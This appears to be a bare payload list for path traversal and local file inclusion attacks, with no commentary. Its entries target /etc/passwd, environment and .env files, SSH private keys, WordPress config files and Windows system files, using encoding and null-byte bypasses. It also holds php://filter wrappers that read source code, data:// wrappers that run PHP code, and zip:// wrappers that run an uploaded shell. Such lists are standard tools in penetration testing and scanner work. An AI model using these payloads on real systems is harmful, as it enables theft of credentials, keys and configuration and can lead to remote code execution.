../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
/etc/passwd
../../../etc/hosts
/proc/self/environ
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/www/html/config.php
/var/www/html/wp-config.php
.env
.htpasswd
.bash_history
.ssh/id_rsa

C:\Windows\win.ini
C:\boot.ini
C:\Windows\System32\drivers\etc\hosts
C:\xampp\apache\logs\access.log
C:\inetpub\wwwroot\web.config
C:\Users\Administrator\AppData\Local\Temp\sess_*

../../../etc/passwd%00
../../../../etc/passwd%00
C:\Windows\win.ini%00

....//....//....//etc/passwd
..////../..////etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%5c../%5c../%5c../etc/passwd

..\\..\\Windows\\win.ini
..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts
\\?\C:\Windows\win.ini
\\localhost\c$\Windows\win.ini
..;/..;/Windows/win.ini

php://filter/convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=wp-config.php

data://text/plain,<?php phpinfo(); ?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

zip://uploads/shell.zip#shell.php
zip://./uploads/shell.zip#shell.php

/var/log/httpd/access_log
/var/log/nginx/access.log
/tmp/sess_1234567890abcdef

....//....//....//....//etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
